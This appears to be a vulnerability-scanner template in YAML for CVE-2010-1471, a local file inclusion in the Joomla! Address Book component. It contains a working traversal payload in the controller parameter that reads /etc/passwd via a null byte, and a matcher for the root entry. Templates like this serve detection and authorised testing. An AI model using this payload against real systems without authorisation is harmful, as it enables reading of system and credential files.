33 lines
1.0 KiB
YAML
33 lines
1.0 KiB
YAML
id: CVE-2010-1471
|
|
|
|
info:
|
|
name: Joomla! Component Address Book 1.5.0 - Local File Inclusion
|
|
author: daffainfo
|
|
severity: high
|
|
description: A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/12170
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2010-1471
|
|
- http://www.vupen.com/english/advisories/2010/0862
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2010-1471
|
|
cwe-id: CWE-22
|
|
tags: cve,cve2010,joomla,lfi,edb
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
- type: status
|
|
status:
|
|
- 200
|